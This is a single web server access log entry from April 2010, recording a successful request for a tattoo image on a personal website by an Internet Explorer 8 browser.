74.73.229.100 - - [26/Apr/2010:12:27:06 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
